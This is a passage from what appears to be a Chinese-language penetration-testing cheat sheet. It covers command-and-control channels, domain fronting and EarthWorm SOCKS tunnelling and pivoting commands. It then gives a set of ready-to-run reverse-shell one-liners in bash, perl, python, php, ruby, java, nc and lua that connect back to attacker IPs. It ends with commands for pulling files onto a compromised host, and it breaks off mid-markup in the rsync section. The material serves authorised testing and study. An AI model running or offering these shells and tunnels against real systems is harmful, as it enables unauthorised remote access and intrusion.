id="网站应用程序渗透"><a href="#网站应用程序渗透" class="headerlink" title="网站应用程序渗透"></a>网站应用程序渗透</h3><ul><li>SQL注入 </li><li>跨站脚本(XSS) </li><li>跨站请求伪造(CSRF) </li><li>SSRF(<a href="https://github.com/bcoles/ssrf_proxy">ssrf_proxy</a>) </li><li>功能/业务逻辑漏洞 </li><li>其他漏洞等 </li><li>CMS-内容管理系统漏洞 </li><li>企业自建代理</li></ul><h3 id="无线Wi-Fi接入"><a href="#无线Wi-Fi接入" class="headerlink" title="无线Wi-Fi接入"></a>无线Wi-Fi接入</h3><h2 id="隐匿攻击"><a href="#隐匿攻击" class="headerlink" title="隐匿攻击"></a>隐匿攻击</h2><h3 id="Command-and-Control"><a href="#Command-and-Control" class="headerlink" title="Command and Control"></a>Command and Control</h3><ul><li>ICMP :<a href="https://pentestlab.blog/2017/07/28/command-and-control-icmp/">https://pentestlab.blog/2017/07/28/command-and-control-icmp/</a></li><li>DNS :<a href="https://pentestlab.blog/2017/09/06/command-and-control-dns/">https://pentestlab.blog/2017/09/06/command-and-control-dns/</a></li><li>DropBox :<a href="https://pentestlab.blog/2017/08/29/command-and-control-dropbox/">https://pentestlab.blog/2017/08/29/command-and-control-dropbox/</a></li><li>Gmail :<a href="https://pentestlab.blog/2017/08/03/command-and-control-gmail/">https://pentestlab.blog/2017/08/03/command-and-control-gmail/</a></li><li>Telegram :<a href="http://drops.xmd5.com/static/drops/tips-16142.html">http://drops.xmd5.com/static/drops/tips-16142.html</a></li><li>Twitter :<a href="https://pentestlab.blog/2017/09/26/command-and-control-twitter/">https://pentestlab.blog/2017/09/26/command-and-control-twitter/</a></li><li>Website Keyword :<a href="https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/">https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/</a></li><li>PowerShell :<a href="https://pentestlab.blog/2017/08/19/command-and-control-powershell/">https://pentestlab.blog/2017/08/19/command-and-control-powershell/</a></li><li>Windows COM :<a href="https://pentestlab.blog/2017/09/01/command-and-control-windows-com/">https://pentestlab.blog/2017/09/01/command-and-control-windows-com/</a></li><li>WebDAV :<a href="https://pentestlab.blog/2017/09/12/command-and-control-webdav/">https://pentestlab.blog/2017/09/12/command-and-control-webdav/</a></li><li>Office 365 :<a href="https://www.anquanke.com/post/id/86974">https://www.anquanke.com/post/id/86974</a></li><li>HTTPS :<a href="https://pentestlab.blog/2017/10/04/command-and-control-https/">https://pentestlab.blog/2017/10/04/command-and-control-https/</a></li><li>Kernel :<a href="https://pentestlab.blog/2017/10/02/command-and-control-kernel/">https://pentestlab.blog/2017/10/02/command-and-control-kernel/</a></li><li>Website :<a href="https://pentestlab.blog/2017/11/14/command-and-control-website/">https://pentestlab.blog/2017/11/14/command-and-control-website/</a></li><li>WMI :<a href="https://pentestlab.blog/2017/11/20/command-and-control-wmi/">https://pentestlab.blog/2017/11/20/command-and-control-wmi/</a></li><li>WebSocket :<a href="https://pentestlab.blog/2017/12/06/command-and-control-websocket/">https://pentestlab.blog/2017/12/06/command-and-control-websocket/</a></li><li>Images :<a href="https://pentestlab.blog/2018/01/02/command-and-control-images/">https://pentestlab.blog/2018/01/02/command-and-control-images/</a></li><li>Web Interface :<a href="https://pentestlab.blog/2018/01/03/command-and-control-web-interface/">https://pentestlab.blog/2018/01/03/command-and-control-web-interface/</a></li><li>JavaScript :<a href="https://pentestlab.blog/2018/01/08/command-and-control-javascript/">https://pentestlab.blog/2018/01/08/command-and-control-javascript/</a></li><li>…</li></ul><h3 id="Fronting"><a href="#Fronting" class="headerlink" title="Fronting"></a>Fronting</h3><ul><li><a href="https://evi1cg.me/archives/Domain_Fronting.html">Domain Fronting </a></li><li><a href="https://evi1cg.me/archives/Tor_Fronting.html">Tor_Fronting.</a></li></ul><h3 id="代理"><a href="#代理" class="headerlink" title="代理"></a>代理</h3><ul><li>VPN </li><li>shadowsockts :<a href="https://github.com/shadowsocks">https://github.com/shadowsocks</a></li><li>HTTP :<a href="http://cn-proxy.com/">http://cn-proxy.com/</a></li><li>Tor</li></ul><h2 id="内网跨边界应用"><a href="#内网跨边界应用" class="headerlink" title="内网跨边界应用"></a>内网跨边界应用</h2><h3 id="内网跨边界转发"><a href="#内网跨边界转发" class="headerlink" title="内网跨边界转发"></a>内网跨边界转发</h3><ul><li><a href="https://blog.csdn.net/l_f0rm4t3d/article/details/24004555">NC端口转发</a> </li><li><a href="http://blog.chinaunix.net/uid-53401-id-4407931.html">LCX端口转发 </a></li><li><a href="https://github.com/cnlh/nps">nps</a> -> 个人用觉得比较稳定 ~</li><li><a href="https://github.com/fatedier/frp">frp</a></li><li>代理脚本 <ol><li><a href="https://github.com/SECFORCE/Tunna">Tunna </a></li><li><a href="https://github.com/sensepost/reDuh">Reduh </a></li></ol></li><li>…</li></ul><h3 id="内网跨边界代理穿透"><a href="#内网跨边界代理穿透" class="headerlink" title="内网跨边界代理穿透"></a>内网跨边界代理穿透</h3><h4 id="EW"><a href="#EW" class="headerlink" title="EW"></a><a href="https://rootkiter.com/EarthWorm/">EW</a></h4><p>正向 SOCKS v5 服务器:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">./ew -s ssocksd -l 1080</span></span></code></pre></div><p> 反弹 SOCKS v5 服务器:<br>a) 先在一台具有公网 ip 的主机A上运行以下命令:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s rcsocks -l 1080 -e 8888 </span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><p>b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s rssocks -d 1.1.1.1 -e 8888 </span></span></code></pre></div><p>多级级联</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s lcx_listen -l 1080 -e 8888</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999</span></span></code></pre></div><p>lcx_tran 的用法</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s ssocksd -l 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999</span></span></code></pre></div><p>lcx_listen、lcx_slave 的用法</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s lcx_listen -l 1080 -e 8888</span></span><span class="line"><span style="color: #babed8">$ ./ew -s ssocksd -l 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999</span></span></code></pre></div><p>“三级级联”的本地SOCKS测试用例以供参考</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$ ./ew -s rcsocks -l 1080 -e 8888</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999</span></span><span class="line"><span style="color: #babed8">$ ./ew -s lcx_listen -l 9999 -e 7777</span></span><span class="line"><span style="color: #babed8">$ ./ew -s rssocks -d 127.0.0.1 -e 7777</span></span></code></pre></div><h4 id="Termite"><a href="#Termite" class="headerlink" title="Termite"></a><a href="https://rootkiter.com/Termite/">Termite</a></h4><p>使用说明:<a href="https://rootkiter.com/Termite/README.txt">https://rootkiter.com/Termite/README.txt</a> </p><h4 id="代理脚本"><a href="#代理脚本" class="headerlink" title="代理脚本"></a>代理脚本</h4><p>reGeorg :<a href="https://github.com/sensepost/reGeorg">https://github.com/sensepost/reGeorg</a><br>Neo-reGeorg:<a href="https://github.com/L-codes/Neo-reGeorg">https://github.com/L-codes/Neo-reGeorg</a><br>pystinger(毒刺):<a href="https://github.com/FunnyWolf/pystinger">https://github.com/FunnyWolf/pystinger</a><br>ABPTTS:<a href="https://github.com/nccgroup/ABPTTS">https://github.com/nccgroup/ABPTTS</a></p><h3 id="shell反弹"><a href="#shell反弹" class="headerlink" title="shell反弹"></a>shell反弹</h3><p>bash </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">bash -i >& /dev/tcp/10.0.0.1/8080 0>&1</span></span></code></pre></div><p>perl </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</span></span></code></pre></div><p>python </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span></code></pre></div><p>php </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'</span></span></code></pre></div><p>ruby </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'</span></span></code></pre></div><p>java </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">r = Runtime.getRuntime()</span></span><span class="line"><span style="color: #babed8">p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])</span></span><span class="line"><span style="color: #babed8">p.waitFor()</span></span></code></pre></div><p>nc </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#使用-e </span></span><span class="line"><span style="color: #babed8">nc -e /bin/sh 223.8.200.234 1234 </span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#不使用-e</span></span><span class="line"><span style="color: #babed8">mknod /tmp/backpipe p</span></span><span class="line"><span style="color: #babed8">/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe</span></span></code></pre></div><p>lua </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"</span></span></code></pre></div><h3 id="内网文件的传输和下载"><a href="#内网文件的传输和下载" class="headerlink" title="内网文件的传输和下载"></a>内网文件的传输和下载</h3><p>wput </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wput dir_name ftp://linuxpig:123456@host.com/</span></span></code></pre></div><p>wget </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wget http://site.com/1.rar -O 1.rar</span></span></code></pre></div><p>ariac2(需安装) </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2</span></span></code></pre></div><p>powershell</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$p = New-Object System.Net.WebClient </span></span><span class="line"><span style="color: #babed8">$p.DownloadFile("http://domain/file","C:%homepath%file") </span></span></code></pre></div><p>vbs脚本 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Set args = Wscript.Arguments</span></span><span class="line"><span style="color: #babed8">Url = "http://domain/file"</span></span><span class="line"><span style="color: #babed8">dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")</span></span><span class="line"><span style="color: #babed8">dim bStrm: Set bStrm = createobject("Adodb.Stream")</span></span><span class="line"><span style="color: #babed8">xHttp.Open "GET", Url, False</span></span><span class="line"><span style="color: #babed8">xHttp.Send</span></span><span class="line"><span style="color: #babed8">with bStrm</span></span><span class="line"><span style="color: #babed8">.type = 1 '</span></span><span class="line"><span style="color: #babed8">.open</span></span><span class="line"><span style="color: #babed8">.write xHttp.responseBody</span></span><span class="line"><span style="color: #babed8">.savetofile " C:\%homepath%\file", 2 '</span></span><span class="line"><span style="color: #babed8">end with</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行 :cscript test.vbs</p></blockquote><p>Perl </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!/usr/bin/perl </span></span><span class="line"><span style="color: #babed8">use LWP::Simple; </span></span><span class="line"><span style="color: #babed8">getstore("http://domain/file", "file");</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:perl test.pl</p></blockquote><p>Python </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!/usr/bin/python </span></span><span class="line"><span style="color: #babed8">import urllib2 </span></span><span class="line"><span style="color: #babed8">u = urllib2.urlopen('http://domain/file') </span></span><span class="line"><span style="color: #babed8">localFile = open('local_file', 'w') </span></span><span class="line"><span style="color: #babed8">localFile.write(u.read()) </span></span><span class="line"><span style="color: #babed8">localFile.close()</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:python test.py</p></blockquote><p>Ruby </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!/usr/bin/ruby</span></span><span class="line"><span style="color: #babed8">require 'net/http'</span></span><span class="line"><span style="color: #babed8">Net::HTTP.start("www.domain.com") { |http|</span></span><span class="line"><span style="color: #babed8">r = http.get("/file")</span></span><span class="line"><span style="color: #babed8">open("save_location", "wb") { |file|</span></span><span class="line"><span style="color: #babed8">file.write(r.body)</span></span><span class="line"><span style="color: #babed8">}</span></span><span class="line"><span style="color: #babed8">}</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:ruby test.rb</p></blockquote><p>PHP </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><?php</span></span><span class="line"><span style="color: #babed8">$url = 'http://www.example.com/file';</span></span><span class="line"><span style="color: #babed8">$path = '/path/to/file';</span></span><span class="line"><span style="color: #babed8">$ch = curl_init($url);</span></span><span class="line"><span style="color: #babed8">curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);</span></span><span class="line"><span style="color: #babed8">$data = curl_exec($ch);</span></span><span class="line"><span style="color: #babed8">curl_close($ch);</span></span><span class="line"><span style="color: #babed8">file_put_contents($path, $data);</span></span><span class="line"><span style="color: #babed8">?></span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>执行:php test.php</p></blockquote><p>NC<br>attacker </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">cat file | nc -l 1234</span></span></code></pre></div><p>target</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nc host_ip 1234 > file</span></span></code></pre></div><p>FTP</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ftp 127.0.0.1 username password get file exit</span></span></code></pre></div><p>TFTP </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">tftp -i host GET C:%homepath%file location_of_file_on_tftp_server</span></span></code></pre></div><p>Bitsadmin </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">bitsadmin /transfer n http://domain/file c:%homepath%file</span></span></code></pre></div><p>Window 文件共享 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">net use x: \127.0.0.1\share /user:example.comuserID myPassword</span></span></code></pre></div><p>SCP<br>本地到远程 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">scp file user@host.com:/tmp</span></span></code></pre></div><p>远程到本地 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">scp user@host.com:/tmp file</span></span></code></pre></div><p>rsync<br>远程rsync服务器中拷贝文件到本地机 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">rsync -av root@192.168.78.192::www /databack</span></span></code></pre></div><p>本地机器拷贝文件到远程rsync服务器 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki 